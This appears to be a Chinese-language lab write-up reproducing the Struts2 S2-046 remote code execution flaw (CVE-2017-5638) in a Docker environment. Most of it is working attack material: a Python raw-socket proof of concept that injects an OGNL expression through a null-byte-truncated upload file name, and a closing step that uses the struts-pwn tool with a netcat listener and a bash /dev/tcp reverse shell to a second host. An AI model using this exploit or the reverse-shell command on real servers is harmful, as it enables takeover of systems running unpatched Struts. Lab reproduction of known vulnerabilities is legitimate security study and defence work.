S2-046 遠端程式碼執行漏洞(CVE-2017-5638)
阿新 • • 發佈:2022-05-18
影響版本: Struts 2.3.5 - Struts 2.3.31, Struts 2.5 - Struts 2.5.10
漏洞詳情:
漏洞環境
執行如下命令啟動struts2 2.3.30:
docker-compose up -d環境啟動後,訪問http://your-ip:8080即可看到上傳頁面。
漏洞復現
與s2-045類似,但是輸入點在檔案上傳的filename值位置,並需要使用\x00截斷。
由於需要傳送畸形資料包,我們簡單使用原生socket編寫payload:
import socket q = b'''------WebKitFormBoundaryXd004BVJN9pBYBL2 Content-Disposition: form-data; name="upload"; filename="%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Test',233*233)}\x00b" Content-Type: text/plain foo ------WebKitFormBoundaryXd004BVJN9pBYBL2--'''.replace(b'\n', b'\r\n') p = b'''POST / HTTP/1.1 Host: localhost:8080 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,es;q=0.6 Connection: close Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXd004BVJN9pBYBL2 Content-Length: %d '''.replace(b'\n', b'\r\n') % (len(q), ) with socket.create_connection(('your-ip', '8080'), timeout=5) as conn: conn.send(p + q) print(conn.recv(10240).decode())
修改your-IP即可直接執行
233*233已成功執行:
反彈Shell
參考:https://github.com/mazen160/struts-pwn
開啟監聽
nc -lvvp 9999
python3 struts-pwn.py --url 'http://192.168.10.128:8080' -c 'bash -i >& /dev/tcp/192.168.10.129/9999 0>&1'